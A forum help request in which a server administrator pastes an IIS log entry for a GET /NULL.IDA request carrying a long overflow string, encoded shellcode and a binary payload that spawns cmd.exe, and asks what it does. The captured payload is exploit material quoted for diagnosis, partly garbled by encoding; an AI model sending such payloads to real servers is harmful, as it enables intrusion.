New IIS Exploit?

2025-04-08

Has anyone seen activity like this? I have the IIS lockdown tool installed with all patches (double checked with baseline security analyzer) and it still spawned 25+ cmd.exe processes. Problem is, I don't know what it's doing with the command shell. I've replaced my ip as 204.95.x.x.

Also, it looks similar to code red in form, but much longer.

2004-01-04 12:29:31 218.155.6.250 - W3SVC1 hosting01 204.95.x.x 80 GET /NULL.IDA CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC%u0aeb%ub890%udacf%u77ee%u0000%u0000%u838b%u0094%u0000%u408b%u0564%u 0150%u0000%ue0ff%u9090=x&ë+_ëèõÿÿÿoð}-÷f¸H3ÉfÈ´ü¬2Äªâú$ìeªP(¹)½k7_Þfqqq×ÚqÈq½Þq'ÖÞqæÒqÇqaíyÒÉf+ÞÉf+ ¶Éf+¢Éf+!ÉÖÉf+\!Éf+OZÒóóÉÒÉf+ZÎð÷÷íØìíöØííøúò¹Ï«©ñ+f+&¶q_af/aíÎ++++ó¦ÉñÚÉ¶Éf+/aó¦ÉÚÉÒÉf+afíý++++róñÚÉÒÉf+aí§++++afí¬++++ªBÊ¦ÊÉÚÉ¢Éf+5aí++++p²fffªYÑZªYZª BÊ½ÊªBÊÊÊÉf++aí++++½Z!ffffZÚ^ÝÉf+þÚªÚÙÚ¥®Ú¡!ÚµÊÊªYÉÉÉÙÉÑÉÉìÉªYÉf+îªÉf+®Éf +ÚZñóÙf+9ZªYÉw^ÉªÉ¶Éf+ÅªYÉwÉ¢É®Éf+ÅZÉ¸^ÊÛÊÉf+eAaÁåEZZ óöÉf+½öÉf+©aí»++++ége4aí++++¥íi¥Yíu¥5íqZn4ZÚÉóf+óóóf+pafÞ¦^ó ÊóñffÉf+§aìé++++ÿöÿÝèßafì++++q³fffßÞóÛÊÉf+iaìº++++óÞÉf+laì++++ÞZªYZú !hî¡ÔÃ+í++++ÑrhAê¥jïájç¹b×ªKÏÎÈ¦b,ÁªP(jÿ>í++++ÀÆ^Û{FÀÆÇSß½ZHxXªPÿßZXxXZòZÒqÉþZ$Ê^Îq¶ ÆÉ«YªPnHek7Á¦í++++ÉÎFqÆÁÞÞÞÞr@Þ¦ìSZÊþÉfÂZÎ$òÊÉfÆZÒÜË×ÜÕª«ÚëüøíüÉðéüÞüíÊíøëíìéÐ÷ÿöØÚëüøíü ÉëöúüêêØÚõöêüÑø÷ýõüÉüüò×øôüýÉðéüÞõöûøõØõõöúÎëðíüßðõüËüøýßðõüÊõüüéÍüëôð÷øíüÉëöúüêêÜáðíÍñëüøýÎÊ«Æª«êöúòüíûð÷ýõðêíü÷øúúüéíêü÷ýëüúïúõöêüê öúòüíÎÊØÊíøëíìéþüíñöêí÷øôüþüíñöêíûà÷øôüêüíêöúòöéíÕöøýÕðûëøëàØÞüíÉëöúØýýëüêêêëî¨éîúUÆr5cmd.exe$ 200 0 190 2070 219 HTTP/1.1 204.95.x.x:80 - - -

Thanks in advance...

Greg